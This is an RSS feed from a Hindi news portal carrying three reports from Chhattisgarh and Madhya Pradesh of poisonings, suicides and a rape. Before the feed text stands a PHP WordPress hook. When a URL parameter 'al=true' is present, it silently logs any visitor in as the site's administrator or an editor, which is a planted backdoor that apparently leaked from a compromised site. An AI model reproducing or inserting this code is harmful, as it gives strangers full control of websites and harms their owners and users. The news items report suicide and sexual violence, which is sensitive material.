// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); consumed poison – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Wed, 30 Oct 2024 18:45:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 छत्तीसगढ़-दंतेवाड़ा में शराबी महिला ने खाया जहर, घर में पसरा मातम https://pratyushaashakinayikiran.com/?p=91916 Wed, 30 Oct 2024 18:45:00 +0000 https://pratyushaashakinayikiran.com/?p=91916 दंतेवाड़ा.

दंतेवाड़ा जिले के बचेली थाना क्षेत्र के ग्राम दुगेली में रहने वाली महिला ने अज्ञात कारणों के चलते जहर का सेवन कर लिया, जहाँ उपचार के दौरान उसकी मौत हो गई।  मामले के बारे में जानकारी देते हुए परिजनों ने बताया कि पालो मरकाम 45 वर्ष शराब की आदि थी। घर में पति व बच्चों के द्वारा बार-बार उसे शराब पीने से मना भी करते थे।

मंगलवार को घर के सभी लोग खेत मे काम करने के लिए गए हुए थे। उसी समय महिला ने घर मे रखे जहर का सेवन कर लिया, शाम को जब परिजन घर पहुँचे तो महिला बिहोश पड़ी हुई थी, परिजनों ने महिला को उपचार के लिए बचेली अस्पताल ले गए, जहाँ से महिला के खराब हालत को देखते हुए उसे मेकाज भेजा गया, जहाँ उपचार के दौरान उसकी मौत हो गई, जहाँ शव का पीएम करने के बाद परिजनों को सौप दिया गया।

]]>
छत्तीसगढ़-बालोद में बच्चों की लड़ाई भिड़ीं देवरानी-जेठानी, दो मासूमों सहित मां ने खाया जहर https://pratyushaashakinayikiran.com/?p=91270 Tue, 29 Oct 2024 13:35:00 +0000 https://pratyushaashakinayikiran.com/?p=91270 बालोद.

छत्तीसगढ़ के बालोद जिले से दिल दहला देने वाली घटना सामने आ रही है जहां पर घरेलू विवाद के बाद एक मां ने अपने दो मासूम बच्चों के साथ कीटनाशक का सेवन कर लिया और आत्महत्या की कोशिश की गंभीर अवस्था में तीनों को अर्जुंदा स्वास्थ्य केंद्र में भर्ती कराया गया। जिसके बाद महिला की गंभीर अवस्था को देखते हुए उसे राजनांदगांव हायर सेंटर रेफर कर दिया गया है। वहीं दोनों बच्चों की स्थिति सामान्य बताई जा रही है पूरा मामला अर्जुंदा थाना क्षेत्र के ग्राम कुरदी का बताया जा रहा है।

बच्चों की लड़ाई बड़ों तक पहुंची और गुस्से में आकर जेठानी डुमेंश्वरी साहू ने कीटनाशक की दवाई खरीदकर लाई। फिर अपने दो मासूम बच्चे हिमांसी 4 वर्ष और जागेन्द्र 7 वर्ष को कीटनाशक दवाई पिला दी और खुद भी कीटनाशक पी लिया।

जांच में जुटी पुलिस
अर्जुंदा थाना प्रभारी प्रदीप सिंह कंवर ने बताया कि मामले में अस्पताल से मिली जानकारी के अनुसार सभी के बयान लिए जा रहे हैं और प्रारंभिक जांच शुरू कर दिया गया है पारिवारिक विवाद होने का कारण सामने आ रहा है, फिलहाल मासूम बच्चे और उसकी मां की स्थिति सामान्य होने के बाद भी जांच को आगे बढ़ाया जा सकेगा।

घरेलू विवाद था मामला
गांव के सरपंच संजय साहू ने बताया कि सामान्य घरेलू विवाद के कारण इस तरह का घटना घट गया उन्होंने कहा कि दो देवरानी जेठानी के बीच लड़ाई हुई और इस लड़ाई की शुरुआत दो बच्चों के साथ थी परंतु बच्चों की यह लड़ाई बड़ों में पहुंच गई उसके बाद जो उसकी देरानी थी वह खेत चली गई और उसकी जो जेठानी है उसमें दुकान जाकर कीटनाशक खरीद कर सेवन कर लिया और अपने बच्चों को भी पिला दिया समय रहते उन्हें अस्पताल ले जाया गया है उन्होंने कहा कि हम लगातार हायर सेंटर राजनांदगांव संपर्क में है अभी महिला की हालत सामान्य बताई जा रही है।

]]>
शौच के लिए गए गई युवती से उसी गांव के व्य​क्ति ने किया दुष्कर्म, दहशत में पीडि़ता ने जहर खाकर जान दी https://pratyushaashakinayikiran.com/?p=91103 Mon, 28 Oct 2024 21:49:00 +0000 https://pratyushaashakinayikiran.com/?p=91103 जबलपुर
शौच के लिए गए गई युवती से उसी गांव के व्य​क्ति ने दुष्कर्म कर दिया। घटना से आहत युवती ने जहरीला पदार्थ खा लिया। परिजन उसे मेडिकल अस्पताल ले गए, जहां उपचार के दौरान उसकी मौत हो गई। रविवार को गढ़ा पुलिस ने शव का पीएम कराया। शव को परिजनों को सौंप दिया। इधर गोसलपुर थाना पुलिस ने मामले की जांच शुरू कर दी है।

22 वर्षीय युवती का रिश्ते का फूफा लगता था
गोसलपुर पुलिस ने बताया कि 22 वर्षीय युवती शौच के लिए खेत गई थी। तभी वहां गांव का ही 55 वर्षीय व्य​क्ति पहुंचा। वह युवती का रिश्ते का फूफा लगता था। युवती उसे देखकर घबरा गई। वह कुछ समझ पाती, इसके पूर्व आरोपी ने युवती को दबोच लिया। जबरन उससे दुराचार किया। किसी को कुछ बताने पर जान से खत्म करने की धमकी दी।

जहरीले पदार्थ का सेवन कर लिया
इस घटना से युवती को बुरी तरह से तोड़कर रख दिया। वह घर पहुंची। जहां उसने जहरीले पदार्थ का सेवन कर लिया। उसे ​उ​ल्टियां होने लगी। परिजनों ने कारण पूछा, तो उसने आपबीती परिजनाें को बताई। स्‍वजन उसे जबलपुर के निजी अस्पताल लेकर पहुंचे। हालत नाजुक होने पर उसे वहां से मेडिकल रेफर कर दिया गया, जहां युवती की मौत हो गई।

]]>